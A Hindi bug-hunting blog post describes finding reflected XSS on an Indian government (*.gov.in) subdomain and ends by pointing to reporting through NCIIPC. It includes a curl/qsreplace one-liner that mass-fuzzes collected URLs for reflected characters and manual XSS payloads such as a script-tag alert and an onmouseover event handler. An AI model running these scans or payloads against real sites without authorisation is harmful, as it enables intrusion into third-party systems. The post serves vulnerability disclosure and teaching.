मैंने *.GOV.IN पर रिफ्लेक्टेड XSS कैसे पाया

May 02 2023
यह ब्लॉग आपको किसी भी वेब एप्लिकेशन में सभी कमजोर पैरामीटर खोजने में मदद करेगा। यह आपको यह भी सिखाएगा कि किसी भी वेबसाइट पर जाकर XSS और SQLI जैसी कमजोरियों का फायदा कैसे उठाया जाए।

यह ब्लॉग आपको किसी भी वेब एप्लिकेशन में सभी कमजोर पैरामीटर खोजने में मदद करेगा। यह आपको यह भी सिखाएगा कि किसी भी वेबसाइट पर जाकर XSS और SQLI जैसी कमजोरियों का फायदा कैसे उठाया जाए।

परावर्तित XSS क्या है:

परावर्तित क्रॉस-साइट स्क्रिप्टिंग (या XSS) एक सुरक्षा भेद्यता है जो तब होती है जब कोई एप्लिकेशन HTTP अनुरोध में डेटा प्राप्त करता है और इसे ठीक से फ़िल्टर किए बिना और इसे साफ किए बिना प्रतिक्रिया के भीतर संग्रहीत करता है।

चलो कदम दर कदम चलते हैं:

डोमेन का चयन करें: *.gov.in

चरण 1: चयनित डोमेन के अंतर्गत सभी संभव उपडोमेन खोजें

चरण 2: किसी एक उपडोमेन का चयन करें

चरण 3: पैरामस्पाइडर जैसे टूल का उपयोग करके सभी संभावित मापदंडों का पता लगाएं

चरण 4: विशेष वर्णों को प्रत्यक्ष रूप से दर्शाने वाले सभी url की जाँच करें।

स्वचालित करने के लिए, नीचे दी गई स्क्रिप्ट का उपयोग करें:

cat urls.txt| egrep -iv ".(jpg|jpeg|js|css|gif|tif|tiff|png|woff|woff2|ico|pdf|svg|txt)" | qsreplace '"><()'| tee combinedfuzz.json && cat combinedfuzz.json | while read host do ; do curl --silent --path-as-is --insecure "$host" | grep -qs "\"><()" && echo -e "$host \033[91m Vullnerable \e[0m \n" || echo -e "$host  \033[92m Not Vulnerable \e[0m \n"; done | tee XSS.txt

      
                

चरण 5: इसे अभी मैन्युअल रूप से आज़माएं:

आइए बुनियादी XSS पेलोड का प्रयास करें:

"><script>alert(1);</script>

पेलोड दर्ज करें

कोई पॉप-अप नहीं:

हमें शुरू से करना चाहिए:

बस इसके साथ प्रयास करें: एकल उद्धरण

'

      
                
No Errors

अब कुछ घटनाओं के साथ प्रयास करें:

' onmouseover=alert(1);>

      
                

आइए स्रोत कोड देखें:

हमें XSS मिला, अब NCIIPC को रिपोर्ट करें

संपर्क:

https://www.linkedin.com/in/prince-prafull-19a477194/